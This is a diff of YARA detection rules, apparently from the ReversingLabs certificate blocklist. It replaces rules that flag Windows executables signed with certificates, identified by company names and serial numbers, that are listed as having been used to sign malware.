 		quality = 90
 		tags = "INFO, FILE"
@@ -16063,21 +40728,21 @@ rule REVERSINGLABS_Cert_Blocklist_98Ab9585C04D7F0E4Cf4De98C14B684D : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AMCERT,LLC" and ( pe.signatures [ i ] . serial == "00:98:ab:95:85:c0:4d:7f:0e:4c:f4:de:98:c1:4b:68:4d" or pe.signatures [ i ] . serial == "98:ab:95:85:c0:4d:7f:0e:4c:f4:de:98:c1:4b:68:4d" ) and 1656547200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LEX CORPORATION PTY LTD" and ( pe.signatures [ i ] . serial == "00:ee:67:89:30:d5:bd:fa:a2:ab:01:72:fa:4c:10:ae:07" or pe.signatures [ i ] . serial == "ee:67:89:30:d5:bd:fa:a2:ab:01:72:fa:4c:10:ae:07" ) and 1571011200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_4631713E66E91347F0388B98Cf747794 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_D7C432E8D4Edef515Bfb9D1C214Ff0F5 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "6c541522-98ab-5acb-af84-c005c9721e1f"
+		id = "5aed508e-2da1-52a0-98f3-52e903e95b7d"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L12462-L12478"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "cb517cda67150b7e17ee3bd946903e8e8eca81742a362032249a2f2387e71c50"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L5366-L5384"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "63741513f3ab2f51ecd66dc973239c9dc194b86504fe26b2dd4a7f31299e5497"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -16087,21 +40752,21 @@ rule REVERSINGLABS_Cert_Blocklist_4631713E66E91347F0388B98Cf747794 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE5\\xB9\\xBF\\xE5\\xB7\\x9E\\xE6\\x98\\x8A\\xE5\\x8A\\xA8\\xE7\\xBD\\x91\\xE7\\xBB\\x9C\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures [ i ] . serial == "46:31:71:3e:66:e9:13:47:f0:38:8b:98:cf:74:77:94" and 1488240000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LLC \"MILKY PUT\"" and ( pe.signatures [ i ] . serial == "00:d7:c4:32:e8:d4:ed:ef:51:5b:fb:9d:1c:21:4f:f0:f5" or pe.signatures [ i ] . serial == "d7:c4:32:e8:d4:ed:ef:51:5b:fb:9d:1c:21:4f:f0:f5" ) and 1601596800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_E963F8983D21B4C1A69C66A9D37498E5 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_5B440A47E8Ce3Dd202271E5C7A666C78 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "4cbc6cc9-1795-5d43-84a1-dd835d7ef349"
+		id = "6f9852cb-277d-5942-b3f7-525593a41027"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L12480-L12498"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "b7c715e28f003351d10ba53657e9e667b635a0e4433276d91d26f4482a61191d"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L5386-L5402"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "eb4387d58e391c356ed774d8c13bb4bbb2befed585bb44674459d3ef519aec58"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -16111,21 +40776,21 @@ rule REVERSINGLABS_Cert_Blocklist_E963F8983D21B4C1A69C66A9D37498E5 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Max Steinhard" and ( pe.signatures [ i ] . serial == "00:e9:63:f8:98:3d:21:b4:c1:a6:9c:66:a9:d3:74:98:e5" or pe.signatures [ i ] . serial == "e9:63:f8:98:3d:21:b4:c1:a6:9c:66:a9:d3:74:98:e5" ) and 1656288000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Master Networking s.r.o." and pe.signatures [ i ] . serial == "5b:44:0a:47:e8:ce:3d:d2:02:27:1e:5c:7a:66:6c:78" and 1601895571 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_6E44Fcedd49F22F7A28Cecc99104F61A : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_B82C6553B2186C219797621Aaa233Edb : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "b69a4e06-a732-5462-b2b1-bdde3fd34e31"
+		id = "e1dd9783-078f-582e-8493-7c493cda9c62"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L12500-L12516"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "caff0cbca45c0dffb673367585824783371f2f4e31a0c9629afb7de708098892"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L5404-L5422"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "72e3e1740a4adc4315d2dd9c9f7b8cee2d89c3006014dec663b70d3419f43ca3"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -16135,21 +40800,21 @@ rule REVERSINGLABS_Cert_Blocklist_6E44Fcedd49F22F7A28Cecc99104F61A : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "M-Trans Maciej Caban" and pe.signatures [ i ] . serial == "6e:44:fc:ed:d4:9f:22:f7:a2:8c:ec:c9:91:04:f6:1a" and 1672923378 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MC Commerce SP Z o o" and ( pe.signatures [ i ] . serial == "00:b8:2c:65:53:b2:18:6c:21:97:97:62:1a:aa:23:3e:db" or pe.signatures [ i ] . serial == "b8:2c:65:53:b2:18:6c:21:97:97:62:1a:aa:23:3e:db" ) and 1585785600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_35B49Ee870Aea532E6Ef0A4987105C8F : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_F360F7Ad0Ed065Fec0B44F98E04481A0 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "88dedb69-52f4-59d3-b397-6a091a866cc5"
+		id = "96219c86-f463-5f11-950d-ca2af75d5559"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L12518-L12534"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "a9d8e9db453f40e32a0cb6412db8885db54053fdf3d7908b884361a493f97b1f"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L5424-L5442"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "2a25f1121f492dec461e570ff56acb0e3957cdf9100002f2ff0b6c3d3b35fee5"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -16159,21 +40824,21 @@ rule REVERSINGLABS_Cert_Blocklist_35B49Ee870Aea532E6Ef0A4987105C8F : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Kancelaria Adwokacka Adwokat Aleksandra Krzemi\\xC5\\x84ska" and pe.signatures [ i ] . serial == "35:b4:9e:e8:70:ae:a5:32:e6:ef:0a:49:87:10:5c:8f" and 1663151018 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MEHANIKUM OOO" and ( pe.signatures [ i ] . serial == "00:f3:60:f7:ad:0e:d0:65:fe:c0:b4:4f:98:e0:44:81:a0" or pe.signatures [ i ] . serial == "f3:60:f7:ad:0e:d0:65:fe:c0:b4:4f:98:e0:44:81:a0" ) and 1599031121 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_063Dcd7D7B0Bc77Cac844C7213Be3989 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Fe41941464B9992A69B7317418Ae8Eb7 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "1bf4b84b-4a32-5908-8ccb-9fce2e5944e6"
+		id = "dd84a6b2-e616-5f93-af50-1a4fc15f3c45"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L12536-L12552"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "091d00b0731f0a3d9917eee945249f001e4b5b1b603cad2fc21eed70ec86aa99"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L5444-L5462"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "bd5131f2b44deec6a7a68577b80ef4d066c331da2976539ce52ac6cff8d5560e"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -16183,21 +40848,21 @@ rule REVERSINGLABS_Cert_Blocklist_063Dcd7D7B0Bc77Cac844C7213Be3989 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HANNAH SISK LIMITED" and pe.signatures [ i ] . serial == "06:3d:cd:7d:7b:0b:c7:7c:ac:84:4c:72:13:be:39:89" and 1656892801 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Milsean Software Limited" and ( pe.signatures [ i ] . serial == "00:fe:41:94:14:64:b9:99:2a:69:b7:31:74:18:ae:8e:b7" or pe.signatures [ i ] . serial == "fe:41:94:14:64:b9:99:2a:69:b7:31:74:18:ae:8e:b7" ) and 1599523200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_6F8777Aa866142Ad7120E5E1C9321E37 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0C14B611A44A1Bae0E8C7581651845B6 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "ace8a8b4-5288-56c4-bd47-9eb42ea41ecb"
+		id = "116beeac-49c6-56b0-a1c0-855623f604d9"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L12554-L12570"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "ca3ff0c7192ba90932d35d053712816555dea051ce15d29a7ccf4e37da989899"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L5464-L5480"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "7f6028181e33e4ba8264ee367169e7259e19ff49dcae9a337a4ba78c06b459e6"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -16207,21 +40872,21 @@ rule REVERSINGLABS_Cert_Blocklist_6F8777Aa866142Ad7120E5E1C9321E37 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CLOUD SOFTWARE LINE CO., LTD." and pe.signatures [ i ] . serial == "6f:87:77:aa:86:61:42:ad:71:20:e5:e1:c9:32:1e:37" and 1629676800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "NEEDCODE SP Z O O" and pe.signatures [ i ] . serial == "0c:14:b6:11:a4:4a:1b:ae:0e:8c:75:81:65:18:45:b6" and 1600300801 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_4A7F07C5D4Ad2E23F9E8E03F0E229Dd4 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_690910Dc89D7857C3500Fb74Bed2B08D : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "76be58d9-d1a3-5dec-807e-941714be80f9"
+		id = "7c427b1a-fbe9-5e97-9810-87863c70988d"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L12572-L12588"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "6dc2bfac77117e294cacc772f7bfaea8b2e3caa26a0afd3729d517e91ca20ea5"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L5482-L5498"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "3c5da6238279296854eb95ecaed802f453e80c6bceb71c3fa587df0f7d40cf96"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -16231,21 +40896,21 @@ rule REVERSINGLABS_Cert_Blocklist_4A7F07C5D4Ad2E23F9E8E03F0E229Dd4 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Danalis LLC" and pe.signatures [ i ] . serial == "4a:7f:07:c5:d4:ad:2e:23:f9:e8:e0:3f:0e:22:9d:d4" and 1608681600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OLIMP STROI, OOO" and pe.signatures [ i ] . serial == "69:09:10:dc:89:d7:85:7c:35:00:fb:74:be:d2:b0:8d" and 1597276800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_F5F9C8F8C33E4Ce84Dd48Fcb03Ccb075 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Fd41E6Bd7428D3008C8A05F68C9Ac6F2 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "74203aa1-e5d0-59d9-b9f8-b79f5fbe271e"
+		id = "ef59a76a-3b59-55a2-9da5-c3ba844bbe77"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L12590-L12608"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "ac3bab3f5a93099f39b0862b419346d1eb3d0f75d86e121ba30626d496c46c57"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L5500-L5518"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "e387664dc9aa746e127b4efb2ef43675f8fb6df66e99d33ef765e8fa306a4f18"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -16255,21 +40920,21 @@ rule REVERSINGLABS_Cert_Blocklist_F5F9C8F8C33E4Ce84Dd48Fcb03Ccb075 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Abdulkadir \\xC5\\x9Eahin" and ( pe.signatures [ i ] . serial == "00:f5:f9:c8:f8:c3:3e:4c:e8:4d:d4:8f:cb:03:cc:b0:75" or pe.signatures [ i ] . serial == "f5:f9:c8:f8:c3:3e:4c:e8:4d:d4:8f:cb:03:cc:b0:75" ) and 1545004800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OM-FAS d.o.o." and ( pe.signatures [ i ] . serial == "00:fd:41:e6:bd:74:28:d3:00:8c:8a:05:f6:8c:9a:c6:f2" or pe.signatures [ i ] . serial == "fd:41:e6:bd:74:28:d3:00:8c:8a:05:f6:8c:9a:c6:f2" ) and 1575590400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_57Fc55239F21F139978609E323097132 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_C7079866C0E48B01246Ba0C148E70D4D : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "e71d575c-5a30-5158-80ee-3508cdaf5636"
+		id = "2c985bd9-cb2a-553a-af63-a2a0a80cc641"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L12610-L12626"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "030bb847e524e672ee382e0284ba3f027920f60c70bbd153d4b9cdd2669e6a99"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L5520-L5538"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "cc144760e0ca21fd98b55ac222db540900def61f54e9644f8cab5f711ec7bf24"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -16279,21 +40944,21 @@ rule REVERSINGLABS_Cert_Blocklist_57Fc55239F21F139978609E323097132 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Aidem Media Limited" and pe.signatures [ i ] . serial == "57:fc:55:23:9f:21:f1:39:97:86:09:e3:23:09:71:32" and 1501632000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO GARANT" and ( pe.signatures [ i ] . serial == "00:c7:07:98:66:c0:e4:8b:01:24:6b:a0:c1:48:e7:0d:4d" or pe.signatures [ i ] . serial == "c7:07:98:66:c0:e4:8b:01:24:6b:a0:c1:48:e7:0d:4d" ) and 1588679105 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Eeefec4308Abe63323600E1608F5E6F2 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_D591Da22F33C800A7024Aecff2Cd6C6D : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "265f70f4-f8cf-52cf-8d9b-ddfefb8a1b79"
+		id = "294cbf90-cd1f-5743-a51a-46e1d04ef34e"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L12628-L12646"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "71ab4bd7e85155bfbc1612941c5f15c409629b116258c38b79bd808512df006a"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L5540-L5558"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "30e421d5ea3c5693c5c9bd0e3dd997ceda9755d17e3fb16d2a8e6c4a327ae32f"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -16303,21 +40968,21 @@ rule REVERSINGLABS_Cert_Blocklist_Eeefec4308Abe63323600E1608F5E6F2 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "YUPITER-STROI, OOO" and ( pe.signatures [ i ] . serial == "00:ee:ef:ec:43:08:ab:e6:33:23:60:0e:16:08:f5:e6:f2" or pe.signatures [ i ] . serial == "ee:ef:ec:43:08:ab:e6:33:23:60:0e:16:08:f5:e6:f2" ) and 1491177600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO T2 Soft" and ( pe.signatures [ i ] . serial == "00:d5:91:da:22:f3:3c:80:0a:70:24:ae:cf:f2:cd:6c:6d" or pe.signatures [ i ] . serial == "d5:91:da:22:f3:3c:80:0a:70:24:ae:cf:f2:cd:6c:6d" ) and 1588679107 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_0Ecd460Ce14Bd8Ef2926Da2Cd9A44176 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_B36E0F2053Caee9C3B966F7Be0B40Fc3 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "94128695-0206-5c04-b792-34400f8ce890"
+		id = "8ed732ae-1c25-59fc-8ebe-50a1eb81e4a9"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L12648-L12664"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "58fa244c125415ef7a3cf0feb79add4db7c84f94c23e5d27e840fb17c18d67ef"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L5560-L5578"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "2444c78aefdb9e8c8004598a318db016d7e781ede6da2ba3ee85316456c3e77b"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -16327,21 +40992,21 @@ rule REVERSINGLABS_Cert_Blocklist_0Ecd460Ce14Bd8Ef2926Da2Cd9A44176 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Rabah Azrarak" and pe.signatures [ i ] . serial == "0e:cd:46:0c:e1:4b:d8:ef:29:26:da:2c:d9:a4:41:76" and 1463035153 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PARTS-JEST d.o.o." and ( pe.signatures [ i ] . serial == "00:b3:6e:0f:20:53:ca:ee:9c:3b:96:6f:7b:e0:b4:0f:c3" or pe.signatures [ i ] . serial == "b3:6e:0f:20:53:ca:ee:9c:3b:96:6f:7b:e0:b4:0f:c3" ) and 1600172855 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_5E75E997F3D70Bb8C182D56B25B7D836 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_5B320A2F46C99C1Ba1357Bee : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "3578b97f-1d87-517a-8ea9-17606017e46a"
+		id = "3912fdfc-7a84-51ce-abd2-977ad183af26"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L12666-L12682"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "a2c6a57759fb0717951f83a32c00deeae82cad772b6cb7f60fa96232b6b82560"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L5580-L5596"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "12797f80bce9d64c6c07e185aa309a0c4f910835745a7f2cc1874fb1211624d8"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -16351,21 +41016,21 @@ rule REVERSINGLABS_Cert_Blocklist_5E75E997F3D70Bb8C182D56B25B7D836 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Primetech Ltd." and pe.signatures [ i ] . serial == "5e:75:e9:97:f3:d7:0b:b8:c1:82:d5:6b:25:b7:d8:36" and 1324252800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "REGION TOURISM LLC" and pe.signatures [ i ] . serial == "5b:32:0a:2f:46:c9:9c:1b:a1:35:7b:ee" and 1602513116 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_D5690D94F15315E143Db10Af35497Dc5 : INFO FILE
